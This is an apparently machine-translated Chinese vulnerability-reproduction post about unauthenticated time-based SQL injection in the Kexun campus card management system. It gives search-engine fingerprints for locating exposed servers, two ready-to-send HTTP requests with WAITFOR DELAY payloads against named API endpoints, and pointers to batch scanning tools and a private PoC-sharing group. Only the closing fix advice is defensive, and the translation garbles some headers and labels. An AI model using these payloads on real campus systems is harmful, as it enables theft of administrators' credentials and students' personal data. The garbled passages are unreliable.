0x01 产品简介
科讯校园一卡通管理系统是专门针对校园环境设计的综合管理系统,以数字化、一体化的方式提高校园管理效率,为师生创造更加便捷、高效的校园生活提供体验。该系统集成了各种功能模块,包括但不限于消费管理、门禁考勤、用水管理和电控、图书馆管理、机房管理等,满足校园内的各种管理需求。该系统具有“一库一网、一卡一密码、全面”的特点,实现了校内各子系统的无缝连接和统一管理。
0x02 漏洞概述
科讯校园卡管理系统的get_kq_tj_today、DormitoryHealthRanking等多个接口均存在SQL注入漏洞,未经身份验证的远程攻击者可窃取数据库信息(管理员后台密码、用户个人信息)。网站等)。即使拥有很高的权限,也可以向服务器写入木马,以获取服务器系统的进一步权限。
0x03 搜索引擎
body=\’http://www.ahkxsoft.com/\’ body=\’一卡登录\’
0x04 漏洞复现
麻点-1
GET /api/get_kq_tj_today?KaID=1%27;WAITFOR%20DELAY%20%270:0:5%27– HTTP/1.1
主机:
User-Agent: Mozilla/5.0(Windows NT 10.0;Win64;x64) AppleWebKit/537.36(KHTML、Gecko 等) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip、deflate
接受语言: zh-CN,zh;q=0.9
关闭连接:
验证SQL 映射
poc-2
GET /api/dormitoryHealthRanking?building=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27– HTTP/1.1
主机:
User-Agent: Mozilla/5.0(Windows NT 10.0;Win64;x64) AppleWebKit/537.36(KHTML、Gecko 等) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip、deflate
接受语言: zh-CN,zh;q=0.9
关闭连接:
验证SQL 映射
0x05 工具批量
nuclei
afrog
xray
POC脚本获取
使用VX扫描并加入我们内部的POC脚本共享圈。
0x06 修复建议
1.关闭互联网暴露或访问界面设置
2.升级到安全版本
#【漏洞复现】上述科讯校园卡管理系统多次延迟SQL注入相关内容来源仅供参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/93927.html
